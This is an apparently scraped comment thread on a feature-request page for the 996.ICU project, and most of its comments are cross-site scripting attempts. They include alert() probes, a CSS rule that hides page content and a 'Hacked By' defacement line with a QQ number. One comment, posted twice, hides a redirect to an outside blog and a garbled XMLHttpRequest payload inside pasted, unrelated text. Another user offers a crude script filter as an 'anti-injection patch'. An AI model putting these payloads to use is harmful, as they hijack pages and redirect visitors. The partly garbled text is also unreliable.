LinXueyuanStdio/996.ICU

卖客星球

Mirsla asked for this feature 10 months ago — 13 comments

Mirsla commented 10 months ago

img,svg,table{visibility: collapse;}

| RichardYuanJ commented 10 months ago

summer is comming!

| yyn1991 commented 10 months ago

zhongter is coming!

doujiaowosunlin commented 10 months ago

傻屌公司

JamesChenX commented 10 months ago

goldEli commented 10 months ago

alert(123)

sadtrain commented 10 months ago

路过

xss67612 commented 10 months ago

Hacked By Helen收徒QQ925999918

superzmy commented 10 months ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }

反注入补丁 <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

itongqingbo commented 10 months ago

111

yinwenjian commented 10 months ago

alert("xss test");

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 反注入补丁 for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>  。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 反注入补丁 for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>  。

Join the discussion!

Sign-in with GitHub to comment